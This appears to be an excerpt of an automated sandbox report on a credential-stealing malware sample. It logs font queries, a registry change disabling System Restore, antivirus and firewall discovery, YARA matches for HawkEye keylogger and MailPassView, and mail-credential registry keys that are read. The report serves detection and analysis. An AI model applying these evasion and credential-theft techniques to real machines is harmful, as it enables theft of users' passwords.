Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings:

                    Disables Windows system restore
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: taskhost.exe, 00000005.00000002.321548245.00000000010D4000.00000004.00000020.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information:

                    Yara detected MailPassView
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.a1fa72.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3b67e00.15.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3b67e00.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3b67e00.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.42e7ae.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.72e7ae.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.72e7ae.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.40b7e00.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3b67e00.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3b67e00.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.40b7e00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.3.taskhost.exe.7421c02.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3b67e00.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.a1fa72.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.283523438.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000000.293259909.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: iExplorer.exe PID: 1352, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Windows Update.exe PID: 5204, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6912, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Yara detected HawkEye Keylogger
                    Source: Yara match | File source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: taskhost.exe PID: 4548, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED
                    Tries to steal Mail credentials (via file access)
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara match | File source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.0.iExplorer.exe.6d8949.2.unpack, type: UNPACKEDPE
